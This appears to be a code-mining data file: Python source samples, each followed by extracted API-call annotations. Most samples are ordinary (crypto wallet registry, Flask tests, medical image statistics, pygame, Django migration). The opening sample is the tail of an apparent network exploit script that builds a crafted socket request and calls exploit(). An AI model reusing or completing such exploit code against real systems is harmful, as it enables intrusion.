# returns len(c) and pad it with zeroes such that there are 8 digits after ARGV
request += 'ARGV' + "{0:0{1}x}".format(len(c), 8) + c
return request
# generate a random string of letters and digits
def random_string_digits(string_length):
# creates string with a set of all letters and digits
letters_digits = string.ascii_letters + string.digits
# creates a random string of string_length
random_string = ''
for i in range(string_length):
random_string = random_string + random.choice(letters_digits)
return random_string
exploit(argv[1], argv[2])
| [
"random.choice",
"socket.socket"
] | [((433, 482), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_STREAM'], {}), '(socket.AF_INET, socket.SOCK_STREAM)\n', (446, 482), False, 'import socket\n'), ((1774, 1803), 'random.choice', 'random.choice', (['letters_digits'], {}), '(letters_digits)\n', (1787, 1803), False, 'import random\n')] |
"""All running cryptoassets are maintained in a coin registry.
Each cryptoasset provides its own Wallet SQLAlchemy model and backend instance which is used to communicate with the network of the cryptoasset.
"""
from zope.dottedname.resolve import resolve
class CoinModelDescription:
"""Describe one cryptocurrency data structures: what SQLAlchemy models and database tables it uses.
The instance of this class is used by :py:class:`cryptoassets.core.models.CoinDescriptionModel` to build the model relatinoships and foreign keys between the tables of one cryptoasset.
"""
def __init__(self, coin_name, wallet_model_name, address_model_name, account_model_name, transaction_model_name, network_transaction_model_name, address_validator):
"""Create the description with fully dotted paths to Python classes.
:param coin_name: Name of this coin, lowercase acronym
"""
assert coin_name == coin_name.lower()
self.coin_name = coin_name
self.wallet_model_name = wallet_model_name
self.address_model_name = address_model_name
self.account_model_name = account_model_name
self.transaction_model_name = transaction_model_name
self.network_transaction_model_name = network_transaction_model_name
self.address_validator = address_validator
# Direct model class reference. Available after Python modules are loaded and Cryptoassets App session initialized
self._Wallet = None
self._Address = None
self._Account = None
self._NetworkTransaction = None
self._Transaction = None
@property
def Wallet(self):
"""Get wallet model class."""
return self._lazy_initialize_class_ref("_Wallet", self.wallet_model_name)
@property
def Address(self):
"""Get address model class."""
return self._lazy_initialize_class_ref("_Address", self.address_model_name)
@property
def Account(self):
"""Get account model class."""
return self._lazy_initialize_class_ref("_Account", self.account_model_name)
@property
def NetworkTransaction(self):
"""Get network transaction model class."""
return self._lazy_initialize_class_ref("_NetworkTransaction", self.network_transaction_model_name)
@property
def Transaction(self):
"""Get transaction model class."""
return self._lazy_initialize_class_ref("_Transaction", self.transaction_model_name)
@property
def wallet_table_name(self):
return "{}_wallet".format(self.coin_name)
@property
def account_table_name(self):
return "{}_account".format(self.coin_name)
@property
def address_table_name(self):
return "{}_address".format(self.coin_name)
@property
def transaction_table_name(self):
return "{}_transaction".format(self.coin_name)
@property
def network_transaction_table_name(self):
return "{}_network_transaction".format(self.coin_name)
def _lazy_initialize_class_ref(self, name, dotted_name):
val = getattr(self, name, None)
if val:
return val
else:
val = resolve(dotted_name)
setattr(self, name, val)
return val
class Coin:
"""Describe one cryptocurrency setup.
Binds cryptocurrency to its backend and database models.
We also carry a flag if we are running in testnet or not. This affects address validation.
"""
def __init__(self, coin_description, backend=None, max_confirmation_count=15, testnet=False):
"""Create a binding between asset models and backend.
:param coin_description: :py:class:`cryptoassets.core.coin.registry.CoinModelDescription`
:param testnet: Are we running a testnet node or real node.
:param backend: :py:class:`cryptoassets.core.backend.base.CoinBackend`
"""
assert isinstance(coin_description, CoinModelDescription)
self.coin_description = coin_description
#: Subclass of :py:class:`cryptoassets.core.backend.base.CoinBackend`.
self.backend = None
#: Lowercase acronym name of this asset
self.name = None
#: This is how many confirmations ``tools.confirmationupdate`` tracks for each network transactions, both incoming and outgoing, until we consider it "closed" and stop polling backend for updates.
self.max_confirmation_count = max_confirmation_count
self.testnet = testnet
@property
def address_model(self):
"""Property to get SQLAlchemy model for address of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericAddress`.
"""
return self.coin_description.Address
@property
def transaction_model(self):
"""Property to get SQLAlchemy model for transaction of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericTransaction`.
"""
return self.coin_description.Transaction
@property
def account_model(self):
"""Property to get SQLAlchemy model for account of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericAccount`.
"""
return self.coin_description.Account
@property
def wallet_model(self):
"""Property to get SQLAlchemy model for account of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericWallet`.
"""
return self.coin_description.Wallet
@property
def network_transaction_model(self):
"""Property to get SQLAlchemy model for account of this cryptoasset.
Subclass of :py:class:`cryptoassets.core.models.GenericWallet`.
"""
return self.coin_description.NetworkTransaction
def validate_address(self, address):
"""Check the address validy against current network.
:return: True if given address is valid.
"""
return self.coin_description.address_validator.validate_address(address, self.testnet)
class CoinRegistry:
"""Holds data of set up cryptocurrencies.
Usually you access this through :py:attr:`cryptoasssets.core.app.CryptoassetsApp.coins` instance.
Example::
cryptoassets_app = CryptoassetsApp()
# ... setup ...
bitcoin = cryptoassets_app.coins.get("btc)
print("We are running bitcoin with backend {}".format(bitcoin.backend))
"""
def __init__(self):
self.coins = {}
def register(self, name, coin):
self.coins[name] = coin
# Setup backref
coin.name = name
def all(self):
"""Get all registered coin models.
:return: List of tuples(coin name, Coin)
"""
return self.coins.items()
def get(self, name):
"""Return coin setup data by its acronym name.
:param name: All lowercase, e.g. ``btc``.
"""
return self.coins.get(name)
| [
"zope.dottedname.resolve.resolve"
] | [((3189, 3209), 'zope.dottedname.resolve.resolve', 'resolve', (['dotted_name'], {}), '(dotted_name)\n', (3196, 3209), False, 'from zope.dottedname.resolve import resolve\n')] |
import json
import unittest
from unittest.mock import patch
from app import app
from exceptions import InvalidDateFormat
from tests.mocks import FakeResponse
class TestFlaskApp(unittest.TestCase):
def setUp(self):
self._app = app
self._app.config.update({
"TESTING": True
})
def test_home_page_should_return_expected_message(self):
with self._app.test_client() as test_client:
expectedResponse = FakeResponse(
data=b"Welcome to Calendar App. Please visit url: 'hostname:port/date' to try it.", status_code=200)
# Hitting home page
actualResponse = test_client.get('/')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data, actualResponse.data)
@patch("app.getDateMatrix")
def test_date_page_should_return_expected_message_for_valid_date(self, stubGetDateMatrix):
dummyDate = "2022-02-27"
expectedDateMatrix = b"[[30, 31, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11, 12], [13, 14, 15, 16, 17, 18, 19], [20, 21, 22, 23, 24, 25, 26], [27, 28, 1, 2, 3, 4, 5], [6, 7, 8, 9, 10, 11, 12]]"
stubGetDateMatrix.return_value = json.loads(
expectedDateMatrix.decode())
expectedResponse = FakeResponse(
data=expectedDateMatrix, status_code=200)
with self._app.test_client() as test_client:
# Hitting home page
actualResponse = test_client.get(f'/{dummyDate}')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data, actualResponse.data)
@patch("app.getDateMatrix")
def test_date_page_should_return_400_for_invalid_date(self, stubGetDateMatrix):
dummyDate = "2022-02-27"
stubGetDateMatrix.side_effect = InvalidDateFormat(
"unittest-invalid-date")
expectedResponse = FakeResponse(
data="unittest-invalid-date", status_code=400)
with self._app.test_client() as test_client:
# Hitting home page
actualResponse = test_client.get(f'/{dummyDate}')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data,
actualResponse.data.decode())
@patch("app.getDateMatrix")
def test_date_page_should_return_500_for_unexpected_server_side_error(self, stubGetDateMatrix):
dummyDate = "2022-02-27"
stubGetDateMatrix.side_effect = Exception(
"unittest-server-side-exception")
expectedResponse = FakeResponse(
data="Server side issue", status_code=500)
with self._app.test_client() as test_client:
# Hitting home page
actualResponse = test_client.get(f'/{dummyDate}')
self.assertEqual(expectedResponse.status_code,
actualResponse.status_code)
self.assertEqual(expectedResponse.data,
actualResponse.data.decode())
if __name__ == "__main__":
unittest.main()
| [
"unittest.main",
"unittest.mock.patch",
"tests.mocks.FakeResponse",
"exceptions.InvalidDateFormat"
] | [((875, 901), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (880, 901), False, 'from unittest.mock import patch\n'), ((1758, 1784), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (1763, 1784), False, 'from unittest.mock import patch\n'), ((2480, 2506), 'unittest.mock.patch', 'patch', (['"""app.getDateMatrix"""'], {}), "('app.getDateMatrix')\n", (2485, 2506), False, 'from unittest.mock import patch\n'), ((3242, 3257), 'unittest.main', 'unittest.main', ([], {}), '()\n', (3255, 3257), False, 'import unittest\n'), ((1346, 1400), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': 'expectedDateMatrix', 'status_code': '(200)'}), '(data=expectedDateMatrix, status_code=200)\n', (1358, 1400), False, 'from tests.mocks import FakeResponse\n'), ((1942, 1984), 'exceptions.InvalidDateFormat', 'InvalidDateFormat', (['"""unittest-invalid-date"""'], {}), "('unittest-invalid-date')\n", (1959, 1984), False, 'from exceptions import InvalidDateFormat\n'), ((2025, 2084), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': '"""unittest-invalid-date"""', 'status_code': '(400)'}), "(data='unittest-invalid-date', status_code=400)\n", (2037, 2084), False, 'from tests.mocks import FakeResponse\n'), ((2764, 2819), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': '"""Server side issue"""', 'status_code': '(500)'}), "(data='Server side issue', status_code=500)\n", (2776, 2819), False, 'from tests.mocks import FakeResponse\n'), ((465, 588), 'tests.mocks.FakeResponse', 'FakeResponse', ([], {'data': 'b"Welcome to Calendar App. Please visit url: \'hostname:port/date\' to try it."', 'status_code': '(200)'}), '(data=\n b"Welcome to Calendar App. Please visit url: \'hostname:port/date\' to try it."\n , status_code=200)\n', (477, 588), False, 'from tests.mocks import FakeResponse\n')] |
# Import Required Modules
import os
import argparse
import numpy as np
import pandas as pd
import reducers as r
from tqdm import tqdm
from skimage.io import imread
##############################################################################
DEFAULT_INPUT_FOLDER = '.../'
DEFAULT_OUTPUT_FOLDER = '.../'
DEFAULT_SURVIVAL_RATE_FILE = 'GBM_Logs.csv'
DEFAULT_IMAGE_SHAPE = (1024, 1024, 3)
SURVIVAL_RATE_FILE_HEADER_NAMES = [
"number",
r.PATIENT_ID,
"survival_rate_days",
"survival_rate_months",
"age_years",
"primary_diagnosis",
]
ENCODINGS = [
{
r.PIXEL_TYPE: "Leading_Edge_LE_(Teal_or_Blue_Areas)",
r.PIXEL_VALUE: (33, 143, 166),
},
{
r.PIXEL_TYPE: "Infiltrating_Tumor_IT_(Purple_Areas)",
r.PIXEL_VALUE: (210, 5, 208)
},
{
r.PIXEL_TYPE: "Cellular_Tumor_CT_(Green_Areas)",
r.PIXEL_VALUE: (5, 208, 4)
},
{
r.PIXEL_TYPE: "Necrosis_CTne_(Black_Areas)",
r.PIXEL_VALUE: (5, 5, 5)
},
{
r.PIXEL_TYPE: "Perinecrotic_Zone_CTpnz_(Light_Blue_Areas)",
r.PIXEL_VALUE: (37, 209, 247)
},
{
r.PIXEL_TYPE: "Pseudopalisading_Cells_Around_Necrosis_CTpan_(Sea_Green_Areas)",
r.PIXEL_VALUE: (6, 208, 170)
},
{
r.PIXEL_TYPE: "Microvascular_Proliferation_CTmvp_(Red_Areas)",
r.PIXEL_VALUE: (255, 102, 0)
},
{
r.PIXEL_TYPE: "Background",
r.PIXEL_VALUE: (255, 255, 255)
}
]
def run(
input_folder,
output_folder,
dry_run,
verbose,
):
if not os.path.exists(input_folder):
raise Exception('Input directory must exist: "{input_folder}"'.format(input_folder=input_folder))
if not os.path.exists(output_folder):
if verbose:
print('Creating output directory "{output_folder}"'.format(output_folder=output_folder))
if not dry_run:
os.makedirs(output_folder, exist_ok=True)
survival_rate_file = os.path.join(input_folder, DEFAULT_SURVIVAL_RATE_FILE)
if not os.path.exists(survival_rate_file):
raise Exception('Survival rate file must exist: "{survival_rate_file}"'.format(survival_rate_file=survival_rate_file))
survival_rate_per_patient = pd.read_csv(survival_rate_file, header=0, names=SURVIVAL_RATE_FILE_HEADER_NAMES)[[r.PATIENT_ID, 'survival_rate_days', 'survival_rate_months']]
average_pixel_type_per_patient = pd.DataFrame()
average_pixel_type_per_patient_reducer = r.AveragePixelTypePerPatientReducer(ENCODINGS)
for patient_id in tqdm(os.listdir(input_folder), total = len(os.listdir(input_folder))):
patient_folder = os.path.join(input_folder, patient_id)
if os.path.isdir(patient_folder):
patient_tissue_blocks = np.zeros((len(os.listdir(patient_folder)),) + DEFAULT_IMAGE_SHAPE)
for i, patient_tissue_block in enumerate(os.listdir(patient_folder)):
patient_tissue_block_file = os.path.join(patient_folder, patient_tissue_block)
patient_tissue_blocks[i, :, :, :] = imread(patient_tissue_block_file)
tissue_blocks_by_patient_id = pd.DataFrame([
{
r.PATIENT_ID: patient_id,
r.SEGMENTATION: patient_tissue_blocks
}
])
_average_pixel_type_per_patient = average_pixel_type_per_patient_reducer \
.calculate_average_pixel_type_per_patient(tissue_blocks_by_patient_id)
average_pixel_type_per_patient = average_pixel_type_per_patient.append(_average_pixel_type_per_patient)
average_pixel_type_per_patient = average_pixel_type_per_patient.drop('Background', axis=1)
average_pixel_type_per_patient \
.merge(survival_rate_per_patient, how="left", on=r.PATIENT_ID) \
.to_csv(output_folder + 'average_pixel_value_per_patient.csv', index=False)
if __name__ == '__main__':
arg_parser = argparse.ArgumentParser('Computers Average Pixel Values Per Patient')
arg_parser.add_argument("--input-folder", default=DEFAULT_INPUT_FOLDER)
arg_parser.add_argument("--output-folder", default=DEFAULT_OUTPUT_FOLDER)
arg_parser.add_argument("--dry-run", action='store_true')
arg_parser.add_argument("--verbose", action='store_true')
args = arg_parser.parse_args()
run(input_folder=args.input_folder,
output_folder=args.output_folder,
dry_run=args.dry_run,
verbose=args.verbose)
| [
"os.path.exists",
"os.listdir",
"argparse.ArgumentParser",
"pandas.read_csv",
"os.makedirs",
"os.path.join",
"skimage.io.imread",
"os.path.isdir",
"reducers.AveragePixelTypePerPatientReducer",
"pandas.DataFrame"
] | [((1974, 2028), 'os.path.join', 'os.path.join', (['input_folder', 'DEFAULT_SURVIVAL_RATE_FILE'], {}), '(input_folder, DEFAULT_SURVIVAL_RATE_FILE)\n', (1986, 2028), False, 'import os\n'), ((2416, 2430), 'pandas.DataFrame', 'pd.DataFrame', ([], {}), '()\n', (2428, 2430), True, 'import pandas as pd\n'), ((2476, 2522), 'reducers.AveragePixelTypePerPatientReducer', 'r.AveragePixelTypePerPatientReducer', (['ENCODINGS'], {}), '(ENCODINGS)\n', (2511, 2522), True, 'import reducers as r\n'), ((3925, 3994), 'argparse.ArgumentParser', 'argparse.ArgumentParser', (['"""Computers Average Pixel Values Per Patient"""'], {}), "('Computers Average Pixel Values Per Patient')\n", (3948, 3994), False, 'import argparse\n'), ((1572, 1600), 'os.path.exists', 'os.path.exists', (['input_folder'], {}), '(input_folder)\n', (1586, 1600), False, 'import os\n'), ((1719, 1748), 'os.path.exists', 'os.path.exists', (['output_folder'], {}), '(output_folder)\n', (1733, 1748), False, 'import os\n'), ((2040, 2074), 'os.path.exists', 'os.path.exists', (['survival_rate_file'], {}), '(survival_rate_file)\n', (2054, 2074), False, 'import os\n'), ((2236, 2321), 'pandas.read_csv', 'pd.read_csv', (['survival_rate_file'], {'header': '(0)', 'names': 'SURVIVAL_RATE_FILE_HEADER_NAMES'}), '(survival_rate_file, header=0, names=SURVIVAL_RATE_FILE_HEADER_NAMES\n )\n', (2247, 2321), True, 'import pandas as pd\n'), ((2550, 2574), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (2560, 2574), False, 'import os\n'), ((2641, 2679), 'os.path.join', 'os.path.join', (['input_folder', 'patient_id'], {}), '(input_folder, patient_id)\n', (2653, 2679), False, 'import os\n'), ((2691, 2720), 'os.path.isdir', 'os.path.isdir', (['patient_folder'], {}), '(patient_folder)\n', (2704, 2720), False, 'import os\n'), ((1907, 1948), 'os.makedirs', 'os.makedirs', (['output_folder'], {'exist_ok': '(True)'}), '(output_folder, exist_ok=True)\n', (1918, 1948), False, 'import os\n'), ((3130, 3215), 'pandas.DataFrame', 'pd.DataFrame', (['[{r.PATIENT_ID: patient_id, r.SEGMENTATION: patient_tissue_blocks}]'], {}), '([{r.PATIENT_ID: patient_id, r.SEGMENTATION:\n patient_tissue_blocks}])\n', (3142, 3215), True, 'import pandas as pd\n'), ((2588, 2612), 'os.listdir', 'os.listdir', (['input_folder'], {}), '(input_folder)\n', (2598, 2612), False, 'import os\n'), ((2878, 2904), 'os.listdir', 'os.listdir', (['patient_folder'], {}), '(patient_folder)\n', (2888, 2904), False, 'import os\n'), ((2951, 3001), 'os.path.join', 'os.path.join', (['patient_folder', 'patient_tissue_block'], {}), '(patient_folder, patient_tissue_block)\n', (2963, 3001), False, 'import os\n'), ((3054, 3087), 'skimage.io.imread', 'imread', (['patient_tissue_block_file'], {}), '(patient_tissue_block_file)\n', (3060, 3087), False, 'from skimage.io import imread\n'), ((2772, 2798), 'os.listdir', 'os.listdir', (['patient_folder'], {}), '(patient_folder)\n', (2782, 2798), False, 'import os\n')] |
# -*- coding: utf-8 -*-
"""
"""
import os
#import codecs
import logging
import ConfigParser
import cmdln
import requests
from nozama.cloudsearch.client.rest import CloudsearchService
class AdminCmds(cmdln.Cmdln):
"""Usage:
{name}-admin -c / --config <admin.ini> SUBCOMMAND [ARGS...]
{name}-admin help SUBCOMMAND
${command_list}
${help_list}
"""
# this is also used as the section to get settings from.
name = "cloudsearch-admin"
def __init__(self, *args, **kwargs):
cmdln.Cmdln.__init__(self, *args, **kwargs)
self.log = logging.getLogger("%s.AdminCmds" % __name__)
def get_optparser(self):
"""Parser for global options (that are not specific to a subcommand).
"""
optparser = cmdln.CmdlnOptionParser(self)
optparser.add_option(
'-c', '--config', action='store',
dest="config_filename",
default="admin.ini",
help='The global config file %default'
)
return optparser
def postoptparse(self):
"""runs after parsing global options"""
@property
def config(self):
"""Return a config instance when called.
Implement file change and reloading here?
"""
cfg_filename = self.options.config_filename
rc = {}
if os.path.isfile(cfg_filename):
config = ConfigParser.ConfigParser()
self.log.debug("config: recovering from <%s>" % cfg_filename)
config.read(cfg_filename)
rc = dict(config.items(self.name))
else:
self.log.warn(
"confg: file not found <%s> using defaults." % cfg_filename
)
if 'url' not in rc:
rc['url'] = "http://localhost:63833"
return rc
def do_ping(self, subcmd, opts):
"""${cmd_name}: Check if the Latchpony REST Service is running.
The URL for the service is read from the configuration file.
${cmd_usage}
${cmd_option_list}
"""
cfg = self.config
lp_service_url = cfg['url']
self.log.debug("ping: URL <%s>" % lp_service_url)
lps = CloudsearchService()
try:
result = lps.ping()
except requests.exceptions.ConnectionError:
self.log.error("Unable to connect to cloudsearch service.")
else:
self.log.info("Connected to cloudsearch service OK: %s" % result)
| [
"logging.getLogger",
"ConfigParser.ConfigParser",
"os.path.isfile",
"nozama.cloudsearch.client.rest.CloudsearchService",
"cmdln.Cmdln.__init__",
"cmdln.CmdlnOptionParser"
] | [((525, 568), 'cmdln.Cmdln.__init__', 'cmdln.Cmdln.__init__', (['self', '*args'], {}), '(self, *args, **kwargs)\n', (545, 568), False, 'import cmdln\n'), ((588, 632), 'logging.getLogger', 'logging.getLogger', (["('%s.AdminCmds' % __name__)"], {}), "('%s.AdminCmds' % __name__)\n", (605, 632), False, 'import logging\n'), ((773, 802), 'cmdln.CmdlnOptionParser', 'cmdln.CmdlnOptionParser', (['self'], {}), '(self)\n', (796, 802), False, 'import cmdln\n'), ((1343, 1371), 'os.path.isfile', 'os.path.isfile', (['cfg_filename'], {}), '(cfg_filename)\n', (1357, 1371), False, 'import os\n'), ((2187, 2207), 'nozama.cloudsearch.client.rest.CloudsearchService', 'CloudsearchService', ([], {}), '()\n', (2205, 2207), False, 'from nozama.cloudsearch.client.rest import CloudsearchService\n'), ((1394, 1421), 'ConfigParser.ConfigParser', 'ConfigParser.ConfigParser', ([], {}), '()\n', (1419, 1421), False, 'import ConfigParser\n')] |
import pygame
black = (0, 0, 0)
white = (255, 255, 255)
grey = (192, 192, 192)
dark_grey = (48, 48, 48)
red = (255, 0, 0)
blue = (0, 0, 255)
green = (0, 255, 0)
pygame.init()
screen = pygame.display.set_mode((300, 300))
class Text(pygame.sprite.Sprite):
def __init__(self, group, text, size, color, width, height):
# Call the parent class (Sprite) constructor
pygame.sprite.Sprite.__init__(self)
self.font = pygame.font.SysFont("Arial", size)
self.textSurf = self.font.render(text, 1, color)
self.image = pygame.Surface((width, height))
W = self.textSurf.get_width()
H = self.textSurf.get_height()
self.image.blit(self.textSurf, [width/2 - W/2, height/2 - H/2])
# class Text(pygame.sprite.Sprite):
# def __init__(self, text, size, color, font=None, **kwargs):
# super(Text, self).__init__()
# self.color = color
# self.font = pygame.font.Font(font, size)
# self.kwargs = kwargs
# self.set(text)
# def set(self, text):
# self.image = self.font.render(str(text), 1, self.color)
# self.rect = self.image.get_rect(**self.kwargs)
group = pygame.sprite.LayeredUpdates()
Text(group, "Coba", 36, blue, 60, 60)
## Code tambahan atau tester
# fontSmall = pygame.font.Font('freesansbold.ttf', 16)
# tPlayer1 = fontSmall.render('PLAYER1', True, green, blue) #(the text, True, text colour, background color)
# tPlayer1R = tPlayer1.get_rect()
# tPlayer1R.center = (100, 100)
run = True
while run:
for e in pygame.event.get():
if e.type ==pygame.QUIT:
run = False
screen.fill((0,0,0))
# screen.blit(tPlayer1, tPlayer1R)
group.update()
group.draw(screen)
pygame.display.flip() | [
"pygame.sprite.LayeredUpdates",
"pygame.init",
"pygame.event.get",
"pygame.Surface",
"pygame.display.set_mode",
"pygame.display.flip",
"pygame.sprite.Sprite.__init__",
"pygame.font.SysFont"
] | [((162, 175), 'pygame.init', 'pygame.init', ([], {}), '()\n', (173, 175), False, 'import pygame\n'), ((185, 220), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(300, 300)'], {}), '((300, 300))\n', (208, 220), False, 'import pygame\n'), ((1174, 1204), 'pygame.sprite.LayeredUpdates', 'pygame.sprite.LayeredUpdates', ([], {}), '()\n', (1202, 1204), False, 'import pygame\n'), ((1541, 1559), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (1557, 1559), False, 'import pygame\n'), ((1728, 1749), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (1747, 1749), False, 'import pygame\n'), ((385, 420), 'pygame.sprite.Sprite.__init__', 'pygame.sprite.Sprite.__init__', (['self'], {}), '(self)\n', (414, 420), False, 'import pygame\n'), ((442, 476), 'pygame.font.SysFont', 'pygame.font.SysFont', (['"""Arial"""', 'size'], {}), "('Arial', size)\n", (461, 476), False, 'import pygame\n'), ((555, 586), 'pygame.Surface', 'pygame.Surface', (['(width, height)'], {}), '((width, height))\n', (569, 586), False, 'import pygame\n')] |
# Generated by Django 3.2.7 on 2021-10-06 05:59
import contact.models.social_links
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='ContactForm',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Created At')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Modified At')),
('is_deleted', models.BooleanField(default=False, verbose_name='Is Instance marked deleted')),
('is_active', models.BooleanField(default=True, verbose_name='Is Instance marked Active')),
('name', models.CharField(max_length=32, verbose_name='Name')),
('email', models.EmailField(blank=True, max_length=254, null=True, verbose_name='Email')),
('contact_number', models.CharField(blank=True, max_length=32, null=True, verbose_name='Contact number')),
('message', models.TextField(verbose_name='Message')),
],
options={
'verbose_name': 'Contact Form',
'verbose_name_plural': 'Contact Forms',
},
),
migrations.CreateModel(
name='SocialLink',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('create_date', models.DateTimeField(auto_now_add=True, verbose_name='Created At')),
('modified_date', models.DateTimeField(auto_now=True, verbose_name='Modified At')),
('is_deleted', models.BooleanField(default=False, verbose_name='Is Instance marked deleted')),
('is_active', models.BooleanField(default=True, verbose_name='Is Instance marked Active')),
('name', models.CharField(max_length=32, verbose_name='Type of notification')),
('image', models.ImageField(upload_to=contact.models.social_links.upload_to, verbose_name='Image')),
],
options={
'verbose_name': 'Social link',
'verbose_name_plural': 'Social links',
},
),
]
| [
"django.db.models.EmailField",
"django.db.models.TextField",
"django.db.models.BooleanField",
"django.db.models.ImageField",
"django.db.models.BigAutoField",
"django.db.models.DateTimeField",
"django.db.models.CharField"
] | [((342, 438), 'django.db.models.BigAutoField', 'models.BigAutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (361, 438), False, 'from django.db import migrations, models\n'), ((469, 535), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Created At"""'}), "(auto_now_add=True, verbose_name='Created At')\n", (489, 535), False, 'from django.db import migrations, models\n'), ((572, 635), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Modified At"""'}), "(auto_now=True, verbose_name='Modified At')\n", (592, 635), False, 'from django.db import migrations, models\n'), ((669, 746), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Is Instance marked deleted"""'}), "(default=False, verbose_name='Is Instance marked deleted')\n", (688, 746), False, 'from django.db import migrations, models\n'), ((779, 854), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Is Instance marked Active"""'}), "(default=True, verbose_name='Is Instance marked Active')\n", (798, 854), False, 'from django.db import migrations, models\n'), ((882, 934), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'verbose_name': '"""Name"""'}), "(max_length=32, verbose_name='Name')\n", (898, 934), False, 'from django.db import migrations, models\n'), ((963, 1041), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'null': '(True)', 'verbose_name': '"""Email"""'}), "(blank=True, max_length=254, null=True, verbose_name='Email')\n", (980, 1041), False, 'from django.db import migrations, models\n'), ((1079, 1169), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(32)', 'null': '(True)', 'verbose_name': '"""Contact number"""'}), "(blank=True, max_length=32, null=True, verbose_name=\n 'Contact number')\n", (1095, 1169), False, 'from django.db import migrations, models\n'), ((1195, 1235), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""Message"""'}), "(verbose_name='Message')\n", (1211, 1235), False, 'from django.db import migrations, models\n'), ((1512, 1608), 'django.db.models.BigAutoField', 'models.BigAutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1531, 1608), False, 'from django.db import migrations, models\n'), ((1639, 1705), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'verbose_name': '"""Created At"""'}), "(auto_now_add=True, verbose_name='Created At')\n", (1659, 1705), False, 'from django.db import migrations, models\n'), ((1742, 1805), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now': '(True)', 'verbose_name': '"""Modified At"""'}), "(auto_now=True, verbose_name='Modified At')\n", (1762, 1805), False, 'from django.db import migrations, models\n'), ((1839, 1916), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Is Instance marked deleted"""'}), "(default=False, verbose_name='Is Instance marked deleted')\n", (1858, 1916), False, 'from django.db import migrations, models\n'), ((1949, 2024), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""Is Instance marked Active"""'}), "(default=True, verbose_name='Is Instance marked Active')\n", (1968, 2024), False, 'from django.db import migrations, models\n'), ((2052, 2120), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(32)', 'verbose_name': '"""Type of notification"""'}), "(max_length=32, verbose_name='Type of notification')\n", (2068, 2120), False, 'from django.db import migrations, models\n'), ((2149, 2241), 'django.db.models.ImageField', 'models.ImageField', ([], {'upload_to': 'contact.models.social_links.upload_to', 'verbose_name': '"""Image"""'}), "(upload_to=contact.models.social_links.upload_to,\n verbose_name='Image')\n", (2166, 2241), False, 'from django.db import migrations, models\n')] |
from pymir.analytics.key_detection.musicnet.ml.note_sequence.base import knn
import argparse
import textwrap
def compute(k=1):
"""
Base model of key detection for
Musicnet metadata based in TF-IDF and KNN
"""
knn.compute(k=k)
def run():
parser = argparse.ArgumentParser(
formatter_class=argparse.RawDescriptionHelpFormatter,
description=textwrap.dedent(compute.__doc__))
parser.add_argument(
'--k', help='Number of Neighbours KNN',
type=int, default=1, required=False)
parser.add_argument(
'--ngram_size', help='Size of ngrams',
type=int, default=5, required=False)
args, extra_params = parser.parse_known_args()
knn.compute(k=args.k, ngram_size=args.ngram_size)
| [
"textwrap.dedent",
"pymir.analytics.key_detection.musicnet.ml.note_sequence.base.knn.compute"
